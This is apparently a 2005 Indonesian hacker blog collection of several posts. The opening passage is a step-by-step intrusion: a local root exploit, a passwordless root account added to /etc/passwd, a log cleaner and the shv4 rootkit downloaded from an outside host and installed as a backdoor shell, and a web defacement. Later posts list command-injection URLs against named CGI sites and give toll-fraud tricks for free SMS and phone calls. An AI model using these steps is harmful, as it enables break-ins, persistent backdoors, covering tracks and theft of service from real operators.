6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo "tondano::0:0::/.tondano:/bin/bash" >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14. last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/" " <== Bersihkan semua tools
25. Test shell dengan port 7788, login as : root, password : gohanz
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA ToNDaNo Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA ToNDaNo Was Here" > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
------------------------------------------------------------------------------------
from : kawan - kawan ku

Hole pada CGI

2005-02-25T19:42:00.000+07:00

semuanya bisanaya letak kelemahan suatu hole di .cgi
banyak yang sering kita jumpai
cobak kita langsung aja oke:

1. Kalian bukkak google.com
2. allinurl:cgi/*.txt
3. oiiiiiii banyak ya hihihihihii
4. Sekarang kau cobak cari yang belakangnya *.txt
5. Contohnya :

http://www.indiabook.com/cgi-bin/text/text.cgi?ads1.txt|id|
http://www.monhabitat.net/cgi-bin/ad.cgi?pied1.txt|id|
http://www.submitshop.com/cgi-bin/text/text.cgi?ads2.txt|id;uname;pwd|
http://www.photoserviceltee.com/cgi-bin/includer/includer.cgi?preload_img.txt|id;uname;pwd|

BUG 10 CODE SMS TELKOMSEL

2005-02-25T19:24:00.000+07:00

AUTOR : YUDHAX

PADA EDISI KEMARIN TELAH SAYA TERANGKAN DAN JABARKAN PEMAKAIAN PEMANFAATAN BUG SMS PADA SATELINDO GSM.
PADA KESEMPATAN INI KITA AKAN RUBAH PERMAINAN KE LAWAN MAIN DARI SATELINDO ITU SENDIRI .... TELKOMSEL GSM

SISTEM GSM yang menggunakan teknik switching dengan memanfaatkan system base station
memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone
ke handphone lain yang nota bene mengirimkan suatu data terenscript yang dapat diditeksi oleh pesawat/nomor
tujuan. dalam hal ini hampir semua fasilitas yang dikembangkan GSM tidak memiliki perbedaan yang sangat rumit,
bahkan malah bisa dibilang HAMPIR SAMA. cuma sekarang dari SATELINDO telah melakukan patching pada
sistem transfer smsnya dengan trik "LAMA" (yang notabene masih juga bisa saya tembus dengan trik baru
..maaf satelindo akan saya bahas besok-besok hari bug barunya...) saya ucapkan salut pada SATELINDO
yang telah melakukan banyak perubahan sistem hantar smsnya dan menggunakan serial yang baru :-) .

Bug sms gratis TELKOMSEL kali ini menggunakan trik yang menyerupai BUG SATELINDO yang lama
yaitu 10 nomer code kartu nomor seri produk TELKOMSEL diantaranya ;
seri 226****** yang mempunyai arti +6281226***** (nomor jakarta)
kode kartu yang bug 260**** s/d 269**** dengan head 0812-
yang berarti kita bisa ngirim sms gratis ke nomor SIMPATI dengan seri 081226***** :-)
note 1: kode * diatas merupakan sembarang nomor (atau semua nomor seri kartu simpati yang aktive)
note 2: hanya dapat dilakukan dengan simcard telkomsel

cara sebagai berikut:

1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281226378** )
(yang saya dapatkan yaitu bug terlkomsel simcard versi 2260**** s/d 2269**** <- diambil dari kode kartu dan
nomor awal dari kartu mentari tersebut) 10 CODE = 2260,2261,2262,2263,2264,2265,2266,2267,2268,2269
3. cara tulis nomor yang dituju menjadi 226378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter
bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish

Dari sana kita bisa lakukan dengan sepuas hati.

Penulis Minta MAAF KEPADA:

1. PIHAK YANG TERKAIT DENGAN SYSTEM SMS DARI TELKOMSEL DAN SEMUA OPERATOR GSM INDONESIA
2. SEMUA PIHAK YANG TERASA TERUGIKAN
3. SEMUA YANG MEMBACA DAN KEMUDIAN TERSINGGUNG KARENA INI.

SALAM PENULIS

---- YUDHAX --------

MOGA YANG DIATAS SELALU MEMBERIKAN ILMU YANG LEBIH PADA SEMUA MASYARAKAT
KITA.

===== TRIK TELPON GRATIS =====

2005-02-25T19:23:00.000+07:00

Sebelumnya maaf jika artikel ini merugikan banyak pihak.
Begitu banyak trik untuk mendapatkan sebuah keCERDIKAN dalam berkomunikasi,
apalagi atas nama komunikasi secara GRATIS. ya kan....

Dalam hal ini saya tidak akan banyak basa-basi lagi.

I. Trik telphon gratis Lokal (dalam kota)

Fasilitas dan cara yang digunakan:
1. Telphone umum koin yang masih hidup
2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama
hingga ada nada "tut/nit/nada sela lainnya"
3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor
telphone lokal)
4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp
yang dituju, maka anda bisa bicara sepuas bibir anda.

note: UNTUK NOMOR LOKAL YANG TIDAK BISA DIHUBUNGI BIASANYA DIKARENAKAN:
1. TERLALU BANYAK NOMOR YANG KEMBAR
2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll
3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG
4. TELKOM SEDANG KENA TROUBLE :))

II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)

Fasilitas dan cara yang digunakan:
1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telphonelah seperti kita menelephone biasa ke NOMOR TUJUAN LUAR
KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:

TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS
SEPERTI NOMOR YANG DITUJU PERTAMA
misal: tujuan 021888555000 -> bila telah selesai ketikan
021888555000 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL

TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN
AKHIR
misal: tujuan 021888555000 -> bila telah selesai ketikan
031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL

CATATAN: HATI² DALAM MELAKUAKN AKSI INI KARENA SANGAT MERUGIKAN LAIN PIHAK.
JANGAN SEKALI² GUNAKAN WARTEL TIPE A UNTUK MELAKUKAN TRIK II TELEPON
GRATIS KE LUAR KOTA KARENA AKAN KELIHATAN PADA KOMPUTER BILLING
OPERATOR D DAN PASTI ANDA DICURIGAI KARENA PULSA AKAN HILANG BEGITU
SAJA DARI LAYAR MONITOR OPERATOR WARTEL.
JANGAN SERING² MENGGGUNAKAN TRIK INI, KARENA AKAN MERUGIKAN "PIHAK LAIN" =))

SEGINI DULU DEH TRIK INI .. KAPAN² KITA BUAT LAGI TRIK BARU YANG LEBIH
MENGHEBOHKAN :)) SALAM MANIS BUAT SEMUA KAWAN² DI DUNIA MAYA #aikmel #e-c-h-o #postgres
#hackercrew (karena aku hanya bagian dari kalian)

-=+> YUDHAX was here <+=-

== BUG SMS SATELINDO ==

2005-02-25T19:19:00.000+07:00

Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan
ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon
yang sangat merobek kantong. GSM yang menggunakan teknik switching dengan
memanfaatkan system base station memungkinkan kita bisa mengirim pesan
alphanumeric singkat dari sebuah Handphone ke handphone lain.oke sampe
disini preambule kita akhiri.

Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?,
itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan
sebuah promosi produk yang akhirnya menjadi komersil. Bug yang saya dapatkan pada
akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM.
kenapa satelindo? nomor yang di keluarkan pihak SATELINDO yang baru dengan nomor
eri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi
kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL,
dll tetap bisa dilakukan secara gratis.

cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan
nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter
bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish

Dari sana kita bisa lakukan dengan sepuas hati.

Penulis Minta MAAF KEPADA:
1. PIHAK YANG TERKAIT DENGAN SYSTEM SMS DARI SATELINDO
2. SEMUA PIHAK YANG TERILHAMI UNTUK MELAKUKAN PERCOBAAN INI
3. SEMUA YANG MEMBACA DAN KEMUDIAN TERSINGGUNG KARENA INI.

SALAM PENULIS

---- YUDHAX --------

MOGA YANG DIATAS SELALU MEMBERIKAN ILMU YANG LEBIH PADA SEMUA MASYARAKAT KITA.